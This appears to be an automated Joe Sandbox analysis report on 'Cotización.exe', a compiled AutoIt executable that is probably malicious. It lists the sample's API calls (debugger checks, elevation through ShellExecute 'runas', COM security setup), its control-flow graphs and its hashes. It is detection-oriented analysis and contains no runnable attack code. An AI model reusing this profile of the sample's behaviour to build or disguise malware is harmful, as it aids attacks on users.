42b177 88771->88772 88786 44b92d VariantClear 88772->88786 88774 42bc5b 88776 40bc24 88775->88776 88777 40bc17 88775->88777 88779 40bc2a 88776->88779 88780 40bc3c 88776->88780 88778 408e80 VariantClear 88777->88778 88781 40bc1f 88778->88781 88782 408e80 VariantClear 88779->88782 88783 4115d7 52 API calls 88780->88783 88781->88770 88784 40bc33 88782->88784 88785 40bc43 88783->88785 88784->88770 88785->88770 88786->88774 88787 425b2b 88792 40f000 88787->88792 88791 425b3a 88793 4115d7 52 API calls 88792->88793 88794 40f007 88793->88794 88795 4276ea 88794->88795 88801 40f030 88794->88801 88800 41130a 51 API calls __cinit 88800->88791 88802 40f039 88801->88802 88803 40f01a 88801->88803 88831 41130a 51 API calls __cinit 88802->88831 88805 40e500 88803->88805 88806 40bc70 52 API calls 88805->88806 88807 40e515 GetVersionExW 88806->88807 88808 402160 52 API calls 88807->88808 88809 40e557 88808->88809 88832 40e660 88809->88832 88815 427674 88819 4276c6 GetSystemInfo 88815->88819 88817 40e5e0 88821 4276d5 GetSystemInfo 88817->88821 88846 40efd0 88817->88846 88818 40e5cd GetCurrentProcess 88853 40ef20 LoadLibraryA GetProcAddress 88818->88853 88819->88821 88824 40e629 88850 40ef90 88824->88850 88827 40e641 FreeLibrary 88828 40e644 88827->88828 88829 40e653 FreeLibrary 88828->88829 88830 40e656 88828->88830 88829->88830 88830->88800 88831->88803 88833 40e667 88832->88833 88834 42761d 88833->88834 88835 40c600 52 API calls 88833->88835 88836 40e55c 88835->88836 88837 40e680 88836->88837 88838 40e687 88837->88838 88839 427616 88838->88839 88840 40c600 52 API calls 88838->88840 88841 40e566 88840->88841 88841->88815 88842 40ef60 88841->88842 88843 40e5c8 88842->88843 88844 40ef66 LoadLibraryA 88842->88844 88843->88817 88843->88818 88844->88843 88845 40ef77 GetProcAddress 88844->88845 88845->88843 88847 40e620 88846->88847 88848 40efd6 LoadLibraryA 88846->88848 88847->88819 88847->88824 88848->88847 88849 40efe7 GetProcAddress 88848->88849 88849->88847 88854 40efb0 LoadLibraryA GetProcAddress 88850->88854 88852 40e632 GetNativeSystemInfo 88852->88827 88852->88828 88853->88817 88854->88852 88855 425b5e 88860 40c7f0 88855->88860 88859 425b6d 88895 40db10 52 API calls 88860->88895 88862 40c82a 88896 410ab0 6 API calls 88862->88896 88864 40c86d 88865 40bc70 52 API calls 88864->88865 88866 40c877 88865->88866 88867 40bc70 52 API calls 88866->88867 88868 40c881 88867->88868 88869 40bc70 52 API calls 88868->88869 88870 40c88b 88869->88870 88871 40bc70 52 API calls 88870->88871 88872 40c8d1 88871->88872 88873 40bc70 52 API calls 88872->88873 88874 40c991 88873->88874 88897 40d2c0 52 API calls 88874->88897 88876 40c99b 88898 40d0d0 53 API calls 88876->88898 88878 40c9c1 88879 40bc70 52 API calls 88878->88879 88880 40c9cb 88879->88880 88899 40e310 53 API calls 88880->88899 88882 40ca28 88883 408f40 VariantClear 88882->88883 88884 40ca30 88883->88884 88885 408f40 VariantClear 88884->88885 88886 40ca38 GetStdHandle 88885->88886 88887 429630 88886->88887 88888 40ca87 88886->88888 88887->88888 88889 429639 88887->88889 88894 41130a 51 API calls __cinit 88888->88894 88900 4432c0 57 API calls 88889->88900 88891 429641 88901 44b6ab CreateThread 88891->88901 88893 42964f CloseHandle 88893->88888 88894->88859 88895->88862 88896->88864 88897->88876 88898->88878 88899->88882 88900->88891 88901->88893 88902 44b5cb 58 API calls 88901->88902 88903 425b6f 88908 40dc90 88903->88908 88907 425b7e 88909 40bc70 52 API calls 88908->88909 88910 40dd03 88909->88910 88916 40f210 88910->88916 88913 40dd96 88914 40ddb7 88913->88914 88919 40dc00 52 API calls 2 library calls 88913->88919 88915 41130a 51 API calls __cinit 88914->88915 88915->88907 88920 40f250 RegOpenKeyExW 88916->88920 88918 40f230 88918->88913 88919->88913 88921 425e17 88920->88921 88922 40f275 RegQueryValueExW 88920->88922 88921->88918 88923 40f2c3 RegCloseKey 88922->88923 88924 40f298 88922->88924 88923->88918 88925 40f2a9 RegCloseKey 88924->88925 88926 425e1d 88924->88926 88925->88918
                APIs
                • _wcslen.LIBCMT ref: 004096C1
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • _memmove.LIBCMT ref: 0040970C
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                • _memmove.LIBCMT ref: 00409D96
                • _memmove.LIBCMT ref: 0040A6C4
                • _memmove.LIBCMT ref: 004297E5
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                • String ID:
                • API String ID: 2383988440-0
                • Opcode ID: 6ff525b2c59c7c054ff9d2bd3b1975f8866825bf581303900bce7b5d9fa65f40
                • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                • Opcode Fuzzy Hash: 6ff525b2c59c7c054ff9d2bd3b1975f8866825bf581303900bce7b5d9fa65f40
                • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                Control-flow Graph

                APIs
                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Cotizaci#U00f3n.exe,00000104,?), ref: 00401F4C
                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Cotizaci#U00f3n.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                • String ID: C:\Users\user\Desktop\Cotizaci#U00f3n.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                • API String ID: 2495805114-1624947455
                • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1515 46cb5f-46cbc3 call 40bc70 * 3 call 408f40 1524 46cbd4-46cbe7 CLSIDFromProgID 1515->1524 1525 46cbc5-46cbcd OleInitialize 1515->1525 1526 46cc33-46cc47 1524->1526 1527 46cbe9-46cbf9 CLSIDFromString 1524->1527 1525->1524 1528 46cca6-46ccba call 458651 1526->1528 1529 46cc49-46cc60 CoCreateInstance 1526->1529 1527->1526 1530 46cbfb-46cc05 1527->1530 1531 46cc96-46cca1 1528->1531 1538 46ccbc-46ccf7 CoInitializeSecurity call 412f40 call 4311fc 1528->1538 1529->1531 1532 46cc62-46cc8b call 43119b 1529->1532 1533 46cc06-46cc30 call 451b42 call 402250 * 3 1530->1533 1531->1533 1550 46cc8e-46cc90 1532->1550 1552 46cdf4 1538->1552 1553 46ccfd-46cd1f call 402160 call 431a2b 1538->1553 1550->1531 1554 46ceb7-46cef0 call 468070 call 402250 * 3 1550->1554 1555 46cdfa-46ce4a call 412f40 CoCreateInstanceEx CoTaskMemFree 1552->1555 1568 46cd35-46cd41 call 465177 1553->1568 1569 46cd21-46cd33 1553->1569 1555->1531 1564 46ce50-46ce55 1555->1564 1564->1531 1567 46ce5b-46ce62 1564->1567 1571 46ce64-46ce8b CoSetProxyBlanket 1567->1571 1572 46ce8d-46ce9e 1567->1572 1579 46cd46-46cda3 call 40e0a0 call 402250 call 46150f call 40e0a0 call 402250 1568->1579 1573 46cda5-46cdaa 1569->1573 1571->1572 1572->1550 1576 46cea4-46ceb2 1572->1576 1577 46cdac-46cdbb call 4111c1 1573->1577 1578 46cdbd-46cdc0 1573->1578 1576->1533 1583 46cdc3-46cdf2 1577->1583 1578->1583 1579->1573 1583->1555
                APIs
                • OleInitialize.OLE32(00000000), ref: 0046CBC7
                • CLSIDFromProgID.COMBASE(?,?), ref: 0046CBDF
                • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                • _wcslen.LIBCMT ref: 0046CDB0
                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                • CoTaskMemFree.OLE32(?), ref: 0046CE42
                • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                Strings
                • NULL Pointer assignment, xrefs: 0046CEA6
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                • String ID: NULL Pointer assignment
                • API String ID: 440038798-2785691316
                • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1986 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1995 40e582-40e583 1986->1995 1996 427674-427679 1986->1996 1997 40e585-40e596 1995->1997 1998 40e5ba-40e5cb call 40ef60 1995->1998 1999 427683-427686 1996->1999 2000 42767b-427681 1996->2000 2002 427625-427629 1997->2002 2003 40e59c-40e59f 1997->2003 2017 40e5ec-40e60c 1998->2017 2018 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1998->2018 2004 427693-427696 1999->2004 2005 427688-427691 1999->2005 2001 4276b4-4276be 2000->2001 2019 4276c6-4276ca GetSystemInfo 2001->2019 2011 427636-427640 2002->2011 2012 42762b-427631 2002->2012 2007 40e5a5-40e5ae 2003->2007 2008 427654-427657 2003->2008 2004->2001 2009 427698-4276a8 2004->2009 2005->2001 2013 40e5b4 2007->2013 2014 427645-42764f 2007->2014 2008->1998 2020 42765d-42766f 2008->2020 2015 4276b0 2009->2015 2016 4276aa-4276ae 2009->2016 2011->1998 2012->1998 2013->1998 2014->1998 2015->2001 2016->2001 2022 40e612-40e623 call 40efd0 2017->2022 2023 4276d5-4276df GetSystemInfo 2017->2023 2018->2017 2030 40e5e8 2018->2030 2019->2023 2020->1998 2022->2019 2027 40e629-40e63f call 40ef90 GetNativeSystemInfo 2022->2027 2032 40e641-40e642 FreeLibrary 2027->2032 2033 40e644-40e651 2027->2033 2030->2017 2032->2033 2034 40e653-40e654 FreeLibrary 2033->2034 2035 40e656-40e65d 2033->2035 2034->2035
                APIs
                • GetVersionExW.KERNEL32(?), ref: 0040E52A
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                • FreeLibrary.KERNEL32(?), ref: 0040E642
                • FreeLibrary.KERNEL32(?), ref: 0040E654
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                • String ID: 0SH$ou
                • API String ID: 3363477735-1412203762
                • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                APIs
                • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: IsThemeActive$uxtheme.dll
                • API String ID: 2574300362-3542929980
                • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                APIs
                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                • FreeLibrary.KERNEL32(?), ref: 0040D78E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: FreeInfoLibraryParametersSystem
                • String ID: ou
                • API String ID: 3403648963-3837949563
                • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                APIs
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                • TranslateMessage.USER32(?), ref: 00409556
                • DispatchMessageW.USER32(?), ref: 00409561
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Message$Peek$DispatchSleepTranslate
                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                • API String ID: 1762048999-758534266
                • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                Control-flow Graph

                APIs
                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Cotizaci#U00f3n.exe,00000104,?), ref: 00401F4C
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • __wcsicoll.LIBCMT ref: 00402007
                • __wcsicoll.LIBCMT ref: 0040201D
                • __wcsicoll.LIBCMT ref: 00402033
                  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                • __wcsicoll.LIBCMT ref: 00402049
                • _wcscpy.LIBCMT ref: 0040207C
                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Cotizaci#U00f3n.exe,00000104), ref: 00428B5B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Cotizaci#U00f3n.exe$CMDLINE$CMDLINERAW
                • API String ID: 3948761352-1521916957
                • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __fread_nolock$_fseek_wcscpy
                • String ID: D)E$D)E$FILE
                • API String ID: 3888824918-361185794
                • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                Control-flow Graph

                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                • __wsplitpath.LIBCMT ref: 0040E41C
                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                • _wcsncat.LIBCMT ref: 0040E433
                • __wmakepath.LIBCMT ref: 0040E44F
                  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                • _wcscpy.LIBCMT ref: 0040E487
                  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                • _wcscat.LIBCMT ref: 00427541
                • _wcslen.LIBCMT ref: 00427551
                • _wcslen.LIBCMT ref: 00427562
                • _wcscat.LIBCMT ref: 0042757C
                • _wcsncpy.LIBCMT ref: 004275BC
                Strings
                Memory Dump Source
